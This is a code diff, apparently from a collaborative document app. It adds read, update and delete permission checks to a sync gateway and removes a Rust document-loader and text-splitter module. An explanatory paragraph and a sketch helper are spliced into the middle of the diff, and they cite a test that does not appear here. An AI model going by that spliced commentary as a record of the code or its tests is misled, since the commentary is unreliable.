@MessageBody() { spaceType, spaceId, docId }: DeleteDocMessage
) {
): Promise<EventResponse<{ success: true }>> {
const adapter = this.selectAdapter(client, spaceType);
await this.assertDocActionAllowed(
spaceType,
@@ -676,6 +684,7 @@ export class SpaceSyncGateway
'Doc.Delete'
);
await adapter.delete(spaceId, docId);
return { data: { success: true } };
}
/**
@@ -692,8 +701,13 @@ export class SpaceSyncGateway
const adapter = this.selectAdapter(client, spaceType);
// Quota recovery mode is intentionally not applied to sync in this phase.
// TODO(@forehalo): enable after frontend supporting doc revert
// await this.ac.user(user.id).doc(spaceId, docId).assert('Doc.Update');
await this.assertDocActionAllowed(
spaceType,
user.id,
spaceId,
docId,
'Doc.Update'
);
const timestamp = await adapter.push(
spaceId,
docId,
@@ -740,15 +754,32 @@ export class SpaceSyncGateway
@SubscribeMessage('space:load-doc-timestamps')
async onLoadDocTimestamps(
@ConnectedSocket() client: Socket,
@CurrentUser() user: CurrentUser,
@MessageBody()
{ spaceType, spaceId, timestamp }: LoadDocTimestampsMessage
): Promise<EventResponse<Record<string, number>>> {
const adapter = this.selectAdapter(client, spaceType);
const stats = await adapter.getTimestamps(spaceId, timestamp);
if (!stats || spaceType === SpaceType.Userspace) {
return {
data: stats ?? {},
};
}
const readableDocs = await this.ac
.user(user.id)
.workspace(spaceId)
.docs(
Object.keys(stats).map(docId => ({ docId })),
'Doc.Read'
);
const readableDocIds = new Set(readableDocs.map(doc => doc.docId));
return {
data: stats ?? {},
data: Object.fromEntries(
Object.entries(stats).filter(([docId]) => readableDocIds.has(docId))
),
};
}
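The filtering step added to `onLoadDocTimestamps` can be looked at in isolation. The sketch below assumes the set of readable doc IDs has already been resolved by the permission layer. `filterReadableTimestamps` is a hypothetical helper name that does not exist in the codebase, and the sample IDs are borrowed from the test above.

```typescript
// Hypothetical helper (assumption): keeps only timestamps for docs the caller may read.
function filterReadableTimestamps(
  stats: Record<string, number>,
  readableDocIds: Iterable<string>
): Record<string, number> {
  // A Set gives O(1) membership checks while walking the timestamp entries.
  const readable = new Set(readableDocIds);
  return Object.fromEntries(
    Object.entries(stats).filter(([docId]) => readable.has(docId))
  );
}

const stats: Record<string, number> = {
  'private-timestamp-doc': Date.UTC(2026, 0, 1),
  'readable-timestamp-doc': Date.UTC(2026, 0, 2),
};
const visible = filterReadableTimestamps(stats, ['readable-timestamp-doc']);
```

Dropping unreadable entries, instead of failing the whole request, means a collaborator still receives timestamps for every doc they can read, which is the behaviour the `load-doc-timestamps` test asserts.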
+10 -67
@@ -7,38 +7,8 @@ version = "0.1.0"
[features]
default = []
doc-loader = [
"docx-parser",
"infer",
"path-ext",
"pdf-extract",
"readability",
"serde",
"serde_json",
"strum_macros",
"text-splitter",
"thiserror",
"tiktoken-rs",
"tree-sitter",
"url",
]
hashcash = ["chrono", "sha3", "rand"]
napi = ["dep:napi"]
tree-sitter = [
"cc",
"dep:tree-sitter",
"dep:tree-sitter-c",
"dep:tree-sitter-c-sharp",
"dep:tree-sitter-cpp",
"dep:tree-sitter-go",
"dep:tree-sitter-java",
"dep:tree-sitter-javascript",
"dep:tree-sitter-kotlin-ng",
"dep:tree-sitter-python",
"dep:tree-sitter-rust",
"dep:tree-sitter-scala",
"dep:tree-sitter-typescript",
]
ydoc-loader = [
"assert-json-diff",
"nanoid",
@@ -51,49 +21,22 @@ ydoc-loader = [
[dependencies]
assert-json-diff = { workspace = true, optional = true }
chrono = { workspace = true, optional = true }
docx-parser = { workspace = true, optional = true }
infer = { workspace = true, optional = true }
nanoid = { workspace = true, optional = true }
napi = { workspace = true, optional = true }
path-ext = { workspace = true, optional = true }
pdf-extract = { workspace = true, optional = true }
pulldown-cmark = { workspace = true, optional = true }
rand = { workspace = true, optional = true }
readability = { workspace = true, optional = true, default-features = false }
serde = { workspace = true, optional = true, features = ["derive"] }
serde_json = { workspace = true, optional = true }
sha3 = { workspace = true, optional = true }
strum_macros = { workspace = true, optional = true }
text-splitter = { workspace = true, features = [
"markdown",
"tiktoken-rs",
], optional = true }
thiserror = { workspace = true, optional = true }
tiktoken-rs = { workspace = true, optional = true }
tree-sitter = { workspace = true, optional = true }
tree-sitter-c = { workspace = true, optional = true }
tree-sitter-c-sharp = { workspace = true, optional = true }
tree-sitter-cpp = { workspace = true, optional = true }
tree-sitter-go = { workspace = true, optional = true }
tree-sitter-java = { workspace = true, optional = true }
tree-sitter-javascript = { workspace = true, optional = true }
tree-sitter-kotlin-ng = { workspace = true, optional = true }
tree-sitter-python = { workspace = true, optional = true }
tree-sitter-rust = { workspace = true, optional = true }
tree-sitter-scala = { workspace = true, optional = true }
tree-sitter-typescript = { workspace = true, optional = true }
url = { workspace = true, optional = true }
y-octo = { workspace = true, optional = true }
chrono = { workspace = true, optional = true }
nanoid = { workspace = true, optional = true }
napi = { workspace = true, optional = true }
pulldown-cmark = { workspace = true, optional = true }
rand = { workspace = true, optional = true }
serde = { workspace = true, optional = true, features = ["derive"] }
serde_json = { workspace = true, optional = true }
sha3 = { workspace = true, optional = true }
thiserror = { workspace = true, optional = true }
y-octo = { workspace = true, optional = true }
[dev-dependencies]
criterion = { workspace = true }
rayon = { workspace = true }
tempfile = "3"
[build-dependencies]
cc = { version = "1", optional = true }
[[bench]]
harness = false
name = "hashcash"
@@ -1,174 +0,0 @@
use std::{
io::Cursor,
panic::{AssertUnwindSafe, catch_unwind},
path::PathBuf,
};
use path_ext::PathExt;
use super::*;
#[derive(Clone, Default)]
pub struct Chunk {
pub index: usize,
pub content: String,
pub start: Option<usize>,
pub end: Option<usize>,
}
pub struct DocOptions {
code_threshold: u64,
}
impl Default for DocOptions {
fn default() -> Self {
Self { code_threshold: 1000 }
}
}
pub struct Doc {
pub name: String,
pub chunks: Vec<Chunk>,
}
impl Doc {
pub fn new(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
Self::with_options(file_path, doc, DocOptions::default())
}
pub fn with_options(file_path: &str, doc: &[u8], options: DocOptions) -> LoaderResult<Self> {
if let Some(kind) = infer::get(&doc[..4096.min(doc.len())]).or(infer::get_from_path(file_path).ok().flatten()) {
if kind.extension() == "pdf" {
return Self::load_pdf(file_path, doc);
} else if kind.extension() == "docx" {
return Self::load_docx(file_path, doc);
} else if kind.extension() == "html" {
return Self::load_html(file_path, doc);
}
} else if let Ok(string) = String::from_utf8(doc.to_vec()).or_else(|_| {
String::from_utf16(
&doc
.chunks_exact(2)
.map(|b| u16::from_le_bytes([b[0], b[1]]))
.collect::<Vec<_>>(),
)
}) {
let path = PathBuf::from(file_path);
match path.ext_str() {
"md" => {
let loader = TextLoader::new(string);
let splitter = MarkdownSplitter::default();
return Self::from_loader(file_path, loader, splitter);
}
"rs" | "c" | "cpp" | "h" | "hpp" | "js" | "ts" | "tsx" | "go" | "py" => {
let name = path.full_str().to_string();
let loader = SourceCodeLoader::from_string(string).with_parser_option(LanguageParserOptions {
language: get_language_by_filename(&name)?,
parser_threshold: options.code_threshold,
});
let splitter = TokenSplitter::default();
return Self::from_loader(file_path, loader, splitter);
}
_ => {}
}
let loader = TextLoader::new(string);
let splitter = TokenSplitter::default();
return Self::from_loader(file_path, loader, splitter);
}
Err(LoaderError::Other("Failed to infer document type".into()))
}
fn from_loader(
file_path: &str,
loader: impl Loader + 'static,
splitter: impl TextSplitter + 'static,
) -> Result<Doc, LoaderError> {
let name = file_path.to_string();
let chunks = catch_unwind(AssertUnwindSafe(|| Self::get_chunks_from_loader(loader, splitter))).map_err(|e| {
LoaderError::Other(match e.downcast::<String>() {
Ok(v) => *v,
Err(e) => match e.downcast::<&str>() {
Ok(v) => v.to_string(),
_ => "Unknown Source of Error".to_owned(),
},
})
})??;
Ok(Self { name, chunks })
}
fn get_chunks_from_loader(
loader: impl Loader + 'static,
splitter: impl TextSplitter + 'static,
) -> Result<Vec<Chunk>, LoaderError> {
let docs = loader.load_and_split(splitter)?;
Ok(
docs
.into_iter()
.enumerate()
.map(|(index, d)| Chunk {
index,
content: d.page_content,
..Chunk::default()
})
.collect(),
)
}
fn load_docx(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
let loader = DocxLoader::new(Cursor::new(doc)).ok_or(LoaderError::Other("Failed to parse docx document".into()))?;
let splitter = TokenSplitter::default();
Self::from_loader(file_path, loader, splitter)
}
fn load_html(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
let loader = HtmlLoader::from_string(
String::from_utf8(doc.to_vec())?,
Url::parse(file_path).or(Url::parse("https://example.com/"))?,
);
let splitter = TokenSplitter::default();
Self::from_loader(file_path, loader, splitter)
}
fn load_pdf(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
let loader = PdfExtractLoader::new(Cursor::new(doc))?;
let splitter = TokenSplitter::default();
Self::from_loader(file_path, loader, splitter)
}
}
#[cfg(test)]
mod tests {
use std::{
fs::{read, read_to_string},
path::PathBuf,
};
use super::*;
const FIXTURES: [&str; 6] = [
"demo.docx",
"sample.pdf",
"sample.html",
"sample.rs",
"sample.c",
"sample.ts",
];
fn get_fixtures() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("fixtures")
}
#[test]
fn test_fixtures() {
let fixtures = get_fixtures();
for fixture in FIXTURES.iter() {
let buffer = read(fixtures.join(fixture)).unwrap();
let doc = Doc::with_options(fixture, &buffer, DocOptions { code_threshold: 0 }).unwrap();
for chunk in doc.chunks.iter() {
let output = read_to_string(fixtures.join(format!("{}.{}.md", fixture, chunk.index))).unwrap();
assert_eq!(chunk.content, output);
}
}
}
}
@@ -1,43 +0,0 @@
use std::{io, str::Utf8Error, string::FromUtf8Error};
use thiserror::Error;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Error, Debug)]
pub enum LoaderError {
#[error("{0}")]
TextSplitter(#[from] TextSplitterError),
#[error(transparent)]
IO(#[from] io::Error),
#[error(transparent)]
Utf8(#[from] Utf8Error),
#[error(transparent)]
FromUtf8(#[from] FromUtf8Error),
#[error(transparent)]
PdfExtract(#[from] pdf_extract::Error),
#[error(transparent)]
PdfExtractOutput(#[from] pdf_extract::OutputError),
#[error(transparent)]
Readability(#[from] readability::error::Error),
#[error(transparent)]
UrlParse(#[from] url::ParseError),
#[error("Unsupported source language")]
UnsupportedLanguage,
#[error("Error: {0}")]
Other(String),
}
pub type LoaderResult<T> = Result<T, LoaderError>;
@@ -1,69 +0,0 @@
use docx_parser::MarkdownDocument;
use super::*;
#[derive(Debug)]
pub struct DocxLoader {
document: MarkdownDocument,
}
impl DocxLoader {
pub fn new<R: Read + Seek>(reader: R) -> Option<Self> {
Some(Self {
document: MarkdownDocument::from_reader(reader)?,
})
}
fn extract_text(&self) -> String {
self.document.to_markdown(false)
}
fn extract_text_to_doc(&self) -> Document {
Document::new(self.extract_text())
}
}
impl Loader for DocxLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let doc = self.extract_text_to_doc();
Ok(vec![doc])
}
}
#[cfg(test)]
mod tests {
use std::{fs::read, io::Cursor, path::PathBuf};
use super::*;
fn get_fixtures_path() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("fixtures")
}
#[test]
fn test_parse_docx() {
let docx_buffer = include_bytes!("../../../fixtures/demo.docx");
let parsed_buffer = include_str!("../../../fixtures/demo.docx.md");
{
let loader = DocxLoader::new(Cursor::new(docx_buffer)).unwrap();
let documents = loader.load().unwrap();
assert_eq!(documents.len(), 1);
assert_eq!(documents[0].page_content, parsed_buffer);
}
{
let loader = DocxLoader::new(Cursor::new(docx_buffer)).unwrap();
let documents = loader.load_and_split(TokenSplitter::default()).unwrap();
for (idx, doc) in documents.into_iter().enumerate() {
assert_eq!(
doc.page_content,
String::from_utf8_lossy(&read(get_fixtures_path().join(format!("demo.docx.{}.md", idx))).unwrap())
);
}
}
}
}
@@ -1,85 +0,0 @@
use std::{collections::HashMap, io::Cursor};
use serde_json::Value;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Debug, Clone)]
pub struct HtmlLoader<R> {
html: R,
url: Url,
}
impl HtmlLoader<Cursor<Vec<u8>>> {
pub fn from_string<S: Into<String>>(input: S, url: Url) -> Self {
let input = input.into();
let reader = Cursor::new(input.into_bytes());
Self::new(reader, url)
}
}
impl<R: Read> HtmlLoader<R> {
pub fn new(html: R, url: Url) -> Self {
Self { html, url }
}
}
impl<R: Read + Send + Sync + 'static> Loader for HtmlLoader<R> {
fn load(mut self) -> LoaderResult<Vec<Document>> {
let cleaned_html = readability::extractor::extract(&mut self.html, &self.url)?;
let doc = Document::new(format!("{}\n{}", cleaned_html.title, cleaned_html.text))
.with_metadata(HashMap::from([("source".to_string(), Value::from(self.url.as_str()))]));
Ok(vec![doc])
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_html_loader() {
let input = "<p>Hello world!</p>";
let html_loader = HtmlLoader::new(input.as_bytes(), Url::parse("https://example.com/").unwrap());
let documents = html_loader.load().unwrap();
let expected = "\nHello world!";
assert_eq!(documents.len(), 1);
assert_eq!(
documents[0].metadata.get("source").unwrap(),
&Value::from("https://example.com/")
);
assert_eq!(documents[0].page_content, expected);
}
#[test]
fn test_html_load_from_path() {
let buffer = include_bytes!("../../../fixtures/sample.html");
let html_loader = HtmlLoader::new(Cursor::new(buffer), Url::parse("https://example.com/").unwrap());
let documents = html_loader.load().unwrap();
let expected = [
"Example Domain",
"",
" This domain is for use in illustrative examples in documents. You may",
" use this domain in literature without prior coordination or asking for",
" permission.",
" More information...",
]
.join("\n");
assert_eq!(documents.len(), 1);
assert_eq!(
documents[0].metadata.get("source").unwrap(),
&Value::from("https://example.com/")
);
assert_eq!(documents[0].page_content, expected);
}
}
@@ -1,28 +0,0 @@
mod docx;
mod html;
mod pdf;
mod source;
mod text;
use std::io::{Read, Seek};
use super::*;
// modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
pub trait Loader: Send + Sync {
fn load(self) -> LoaderResult<Vec<Document>>;
fn load_and_split<TS: TextSplitter + 'static>(self, splitter: TS) -> LoaderResult<Vec<Document>>
where
Self: Sized,
{
let docs = self.load()?;
Ok(splitter.split_documents(&docs)?)
}
}
pub use docx::DocxLoader;
pub use html::HtmlLoader;
pub use pdf::PdfExtractLoader;
pub use source::{LanguageParserOptions, SourceCodeLoader, get_language_by_filename};
pub use text::TextLoader;
pub use url::Url;
@@ -1,103 +0,0 @@
use pdf_extract::{PlainTextOutput, output_doc, output_doc_encrypted};
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Debug, Clone)]
pub struct PdfExtractLoader {
document: pdf_extract::Document,
}
impl PdfExtractLoader {
pub fn new<R: Read>(reader: R) -> Result<Self, LoaderError> {
let document = pdf_extract::Document::load_from(reader)?;
Ok(Self { document })
}
}
impl PdfExtractLoader {
fn extract_text(&self) -> Result<String, LoaderError> {
let mut doc = self.document.clone();
let mut buffer: Vec<u8> = Vec::new();
let mut output = PlainTextOutput::new(&mut buffer as &mut dyn std::io::Write);
if doc.is_encrypted() {
output_doc_encrypted(&mut doc, &mut output, "")?;
} else {
output_doc(&doc, &mut output)?;
}
Ok(String::from_utf8(buffer)?)
}
fn extract_text_to_doc(&self) -> Result<Document, LoaderError> {
let text = self.extract_text()?;
Ok(Document::new(text))
}
}
impl Loader for PdfExtractLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let doc = self.extract_text_to_doc()?;
Ok(vec![doc])
}
}
#[cfg(test)]
mod tests {
use std::{
fs::read,
io::Cursor,
path::{Path, PathBuf},
};
use path_ext::PathExt;
use super::*;
fn parse_pdf_content(path: &Path) -> Vec<Document> {
let buffer = read(path).unwrap();
let reader = Cursor::new(buffer);
let loader = PdfExtractLoader::new(reader).expect("Failed to create PdfExtractLoader");
loader.load().unwrap()
}
#[test]
fn test_parse_pdf() {
let fixtures = PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("fixtures");
let docs = parse_pdf_content(&fixtures.join("sample.pdf"));
assert_eq!(docs.len(), 1);
assert_eq!(
&docs[0].page_content[..100],
"\n\nSample PDF\nThis is a simple PDF file. Fun fun fun.\n\nLorem ipsum dolor sit amet, consectetuer a"
);
}
#[test]
#[ignore = "for debugging only"]
fn test_parse_pdf_custom() {
let mut args = std::env::args().collect::<Vec<_>>();
let fixtures = 'path: {
while let Some(path) = args.pop() {
let path = PathBuf::from(path);
if path.is_dir() {
break 'path path;
}
}
panic!("No directory provided");
};
for path in fixtures.walk_iter(|p| p.is_file() && p.ext_str() == "pdf") {
println!("Parsing: {}", path.display());
let docs = parse_pdf_content(&path);
let chunks = docs.len();
let words = docs.iter().map(|d| d.page_content.len()).sum::<usize>();
println!("{}: {} chunks, {} words", path.display(), chunks, words,);
}
}
}
@@ -1,61 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
mod parser;
pub use parser::{LanguageParser, LanguageParserOptions, get_language_by_filename};
use super::*;
#[derive(Debug, Clone)]
pub struct SourceCodeLoader {
content: String,
parser_option: LanguageParserOptions,
}
impl SourceCodeLoader {
pub fn from_string<S: Into<String>>(input: S) -> Self {
Self {
content: input.into(),
parser_option: LanguageParserOptions::default(),
}
}
}
impl SourceCodeLoader {
pub fn with_parser_option(mut self, parser_option: LanguageParserOptions) -> Self {
self.parser_option = parser_option;
self
}
}
impl Loader for SourceCodeLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let options = self.parser_option.clone();
let docs = LanguageParser::from_language(options.language)
.with_parser_threshold(options.parser_threshold)
.parse_code(&self.content)?;
Ok(docs)
}
}
#[cfg(test)]
mod tests {
use parser::Language;
use super::*;
#[test]
fn test_source_code_loader() {
let content = include_str!("../../../../fixtures/sample.rs");
let loader = SourceCodeLoader::from_string(content).with_parser_option(LanguageParserOptions {
language: Language::Rust,
..Default::default()
});
let documents_with_content = loader.load().unwrap();
assert_eq!(documents_with_content.len(), 1);
}
}
@@ -1,232 +0,0 @@
use std::{collections::HashMap, fmt::Debug, string::ToString};
use strum_macros::Display;
use tree_sitter::{Parser, Tree};
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Display, Debug, Clone)]
pub enum Language {
Rust,
C,
Cpp,
Javascript,
Typescript,
Go,
Python,
}
pub enum LanguageContentTypes {
SimplifiedCode,
FunctionsImpls,
}
impl std::fmt::Display for LanguageContentTypes {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(
f,
"{}",
match self {
LanguageContentTypes::SimplifiedCode => "simplified_code",
LanguageContentTypes::FunctionsImpls => "functions_impls",
}
)
}
}
#[derive(Debug, Clone)]
pub struct LanguageParserOptions {
pub parser_threshold: u64,
pub language: Language,
}
impl Default for LanguageParserOptions {
fn default() -> Self {
Self {
parser_threshold: 1000,
language: Language::Rust,
}
}
}
pub struct LanguageParser {
parser: Parser,
parser_options: LanguageParserOptions,
}
impl Debug for LanguageParser {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "LanguageParser {{ language: {:?} }}", self.parser_options.language)
}
}
impl Clone for LanguageParser {
fn clone(&self) -> Self {
LanguageParser {
parser: get_language_parser(&self.parser_options.language),
parser_options: self.parser_options.clone(),
}
}
}
pub fn get_language_by_filename(name: &str) -> LoaderResult<Language> {
let extension = name.split('.').next_back().ok_or(LoaderError::UnsupportedLanguage)?;
let language = match extension.to_lowercase().as_str() {
"rs" => Language::Rust,
"c" => Language::C,
"cpp" => Language::Cpp,
"h" => Language::C,
"hpp" => Language::Cpp,
"js" => Language::Javascript,
"ts" => Language::Typescript,
"tsx" => Language::Typescript,
"go" => Language::Go,
"py" => Language::Python,
_ => return Err(LoaderError::UnsupportedLanguage),
};
Ok(language)
}
fn get_language_parser(language: &Language) -> Parser {
let mut parser = Parser::new();
let lang = match language {
Language::Rust => tree_sitter_rust::LANGUAGE,
Language::C => tree_sitter_c::LANGUAGE,
Language::Cpp => tree_sitter_cpp::LANGUAGE,
Language::Javascript => tree_sitter_javascript::LANGUAGE,
Language::Typescript => tree_sitter_typescript::LANGUAGE_TSX,
Language::Go => tree_sitter_go::LANGUAGE,
Language::Python => tree_sitter_python::LANGUAGE,
};
parser
.set_language(&lang.into())
.unwrap_or_else(|_| panic!("Error loading grammar for language: {language:?}"));
parser
}
impl LanguageParser {
pub fn from_language(language: Language) -> Self {
Self {
parser: get_language_parser(&language),
parser_options: LanguageParserOptions {
language,
..LanguageParserOptions::default()
},
}
}
pub fn with_parser_threshold(mut self, threshold: u64) -> Self {
self.parser_options.parser_threshold = threshold;
self
}
}
impl LanguageParser {
pub fn parse_code(&mut self, code: &String) -> LoaderResult<Vec<Document>> {
let tree = self.parser.parse(code, None).ok_or(LoaderError::UnsupportedLanguage)?;
if self.parser_options.parser_threshold > tree.root_node().end_position().row as u64 {
return Ok(vec![Document::new(code).with_metadata(HashMap::from([
(
"content_type".to_string(),
serde_json::Value::from(LanguageContentTypes::SimplifiedCode.to_string()),
),
(
"language".to_string(),
serde_json::Value::from(self.parser_options.language.to_string()),
),
]))]);
}
self.extract_functions_classes(tree, code)
}
pub fn extract_functions_classes(&self, tree: Tree, code: &String) -> LoaderResult<Vec<Document>> {
let mut chunks = Vec::new();
let count = tree.root_node().child_count();
for i in 0..count {
let Some(node) = tree.root_node().child(i) else {
continue;
};
let source_code = node.utf8_text(code.as_bytes())?.to_string();
let lang_meta = (
"language".to_string(),
serde_json::Value::from(self.parser_options.language.to_string()),
);
if node.kind() == "function_item" || node.kind() == "impl_item" {
let doc = Document::new(source_code).with_metadata(HashMap::from([
lang_meta.clone(),
(
"content_type".to_string(),
serde_json::Value::from(LanguageContentTypes::FunctionsImpls.to_string()),
),
]));
chunks.push(doc);
} else {
let doc = Document::new(source_code).with_metadata(HashMap::from([
lang_meta.clone(),
(
"content_type".to_string(),
serde_json::Value::from(LanguageContentTypes::SimplifiedCode.to_string()),
),
]));
chunks.push(doc);
}
}
Ok(chunks)
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_code_parser() {
let code = r#"
fn main() {
println!("Hello, world!");
}
pub struct Person {
name: String,
age: i32,
}
impl Person {
pub fn new(name: String, age: i32) -> Self {
Self { name, age }
}
pub fn get_name(&self) -> &str {
&self.name
}
pub fn get_age(&self) -> i32 {
self.age
}
}
"#;
let mut parser = LanguageParser::from_language(Language::Rust);
let documents = parser.parse_code(&code.to_string()).unwrap();
assert_eq!(documents.len(), 1);
// Set the parser threshold to 10 for testing
let mut parser = parser.with_parser_threshold(10);
let documents = parser.parse_code(&code.to_string()).unwrap();
assert_eq!(documents.len(), 3);
assert_eq!(
documents[0].page_content,
"fn main() {\n println!(\"Hello, world!\");\n }"
);
assert_eq!(
documents[1].metadata.get("content_type").unwrap(),
LanguageContentTypes::SimplifiedCode.to_string().as_str()
);
}
}
@@ -1,22 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Debug, Clone)]
pub struct TextLoader {
content: String,
}
impl TextLoader {
pub fn new<T: Into<String>>(input: T) -> Self {
Self { content: input.into() }
}
}
impl Loader for TextLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let doc = Document::new(self.content);
Ok(vec![doc])
}
}
@@ -1,14 +0,0 @@
mod document;
mod error;
mod loader;
mod splitter;
mod types;
pub use document::{Chunk, Doc};
pub use error::{LoaderError, LoaderResult};
use loader::{
DocxLoader, HtmlLoader, LanguageParserOptions, Loader, PdfExtractLoader, SourceCodeLoader, TextLoader, Url,
get_language_by_filename,
};
use splitter::{MarkdownSplitter, TextSplitter, TextSplitterError, TokenSplitter};
use types::Document;
@@ -1,35 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use text_splitter::ChunkConfigError;
use thiserror::Error;
#[derive(Error, Debug)]
pub enum TextSplitterError {
#[error("Empty input text")]
EmptyInputText,
#[error("Mismatch metadata and text")]
MetadataTextMismatch,
#[error("Tokenizer not found")]
TokenizerNotFound,
#[error("Tokenizer creation failed due to invalid tokenizer")]
InvalidTokenizer,
#[error("Tokenizer creation failed due to invalid model")]
InvalidModel,
#[error("Invalid chunk overlap and size")]
InvalidSplitterOptions,
#[error("Error: {0}")]
OtherError(String),
}
impl From<ChunkConfigError> for TextSplitterError {
fn from(_: ChunkConfigError) -> Self {
Self::InvalidSplitterOptions
}
}
@@ -1,36 +0,0 @@
use text_splitter::ChunkConfig;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use super::*;
pub struct MarkdownSplitter {
splitter_options: SplitterOptions,
}
impl Default for MarkdownSplitter {
fn default() -> Self {
MarkdownSplitter::new(SplitterOptions::default())
}
}
impl MarkdownSplitter {
pub fn new(options: SplitterOptions) -> MarkdownSplitter {
MarkdownSplitter {
splitter_options: options,
}
}
}
impl TextSplitter for MarkdownSplitter {
fn split_text(&self, text: &str) -> Result<Vec<String>, TextSplitterError> {
let chunk_config = ChunkConfig::try_from(&self.splitter_options)?;
Ok(
text_splitter::MarkdownSplitter::new(chunk_config)
.chunks(text)
.map(|x| x.to_string())
.collect(),
)
}
}
@@ -1,58 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
mod error;
mod markdown;
mod options;
mod token;
use std::collections::HashMap;
pub use error::TextSplitterError;
pub use markdown::MarkdownSplitter;
use options::SplitterOptions;
use serde_json::Value;
pub use token::TokenSplitter;
use super::*;
pub trait TextSplitter: Send + Sync {
fn split_text(&self, text: &str) -> Result<Vec<String>, TextSplitterError>;
fn split_documents(&self, documents: &[Document]) -> Result<Vec<Document>, TextSplitterError> {
let mut texts: Vec<String> = Vec::new();
let mut metadata: Vec<HashMap<String, Value>> = Vec::new();
documents.iter().for_each(|d| {
texts.push(d.page_content.clone());
metadata.push(d.metadata.clone());
});
self.create_documents(&texts, &metadata)
}
fn create_documents(
&self,
text: &[String],
metadata: &[HashMap<String, Value>],
) -> Result<Vec<Document>, TextSplitterError> {
let mut metadata = metadata.to_vec();
if metadata.is_empty() {
metadata = vec![HashMap::new(); text.len()];
}
if text.len() != metadata.len() {
return Err(TextSplitterError::MetadataTextMismatch);
}
let mut documents: Vec<Document> = Vec::new();
for i in 0..text.len() {
let chunks = self.split_text(&text[i])?;
for chunk in chunks {
let document = Document::new(chunk).with_metadata(metadata[i].clone());
documents.push(document);
}
}
Ok(documents)
}
}
@@ -1,97 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use text_splitter::ChunkConfig;
use tiktoken_rs::{CoreBPE, get_bpe_from_model, get_bpe_from_tokenizer, tokenizer::Tokenizer};
use super::TextSplitterError;
// SplitterOptions holds the configuration for a text splitter.
#[derive(Debug, Clone)]
pub struct SplitterOptions {
pub chunk_size: usize,
pub chunk_overlap: usize,
pub model_name: String,
pub encoding_name: String,
pub trim_chunks: bool,
}
impl Default for SplitterOptions {
fn default() -> Self {
Self::new()
}
}
impl SplitterOptions {
pub fn new() -> Self {
SplitterOptions {
chunk_size: 7168,
chunk_overlap: 128,
model_name: String::from("gpt-3.5-turbo"),
encoding_name: String::from("cl100k_base"),
trim_chunks: true,
}
}
}
// Builder pattern for Options struct
impl SplitterOptions {
pub fn with_chunk_size(mut self, chunk_size: usize) -> Self {
self.chunk_size = chunk_size;
self
}
pub fn with_chunk_overlap(mut self, chunk_overlap: usize) -> Self {
self.chunk_overlap = chunk_overlap;
self
}
pub fn with_model_name(mut self, model_name: &str) -> Self {
self.model_name = String::from(model_name);
self
}
pub fn with_encoding_name(mut self, encoding_name: &str) -> Self {
self.encoding_name = String::from(encoding_name);
self
}
pub fn with_trim_chunks(mut self, trim_chunks: bool) -> Self {
self.trim_chunks = trim_chunks;
self
}
pub fn get_tokenizer_from_str(s: &str) -> Option<Tokenizer> {
match s.to_lowercase().as_str() {
"o200k_base" => Some(Tokenizer::O200kBase),
"cl100k_base" => Some(Tokenizer::Cl100kBase),
"p50k_base" => Some(Tokenizer::P50kBase),
"r50k_base" => Some(Tokenizer::R50kBase),
"p50k_edit" => Some(Tokenizer::P50kEdit),
"gpt2" => Some(Tokenizer::Gpt2),
_ => None,
}
}
}
impl TryFrom<&SplitterOptions> for ChunkConfig<CoreBPE> {
type Error = TextSplitterError;
fn try_from(options: &SplitterOptions) -> Result<Self, Self::Error> {
let tk = if !options.encoding_name.is_empty() {
let tokenizer =
SplitterOptions::get_tokenizer_from_str(&options.encoding_name).ok_or(TextSplitterError::TokenizerNotFound)?;
get_bpe_from_tokenizer(tokenizer).map_err(|_| TextSplitterError::InvalidTokenizer)?
} else {
get_bpe_from_model(&options.model_name).map_err(|_| TextSplitterError::InvalidModel)?
};
Ok(
ChunkConfig::new(options.chunk_size)
.with_sizer(tk)
.with_trim(options.trim_chunks)
.with_overlap(options.chunk_overlap)?,
)
}
}
@@ -1,37 +0,0 @@
use text_splitter::ChunkConfig;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use super::*;
#[derive(Debug, Clone)]
pub struct TokenSplitter {
splitter_options: SplitterOptions,
}
impl Default for TokenSplitter {
fn default() -> Self {
TokenSplitter::new(SplitterOptions::default())
}
}
impl TokenSplitter {
pub fn new(options: SplitterOptions) -> TokenSplitter {
TokenSplitter {
splitter_options: options,
}
}
}
impl TextSplitter for TokenSplitter {
fn split_text(&self, text: &str) -> Result<Vec<String>, TextSplitterError> {
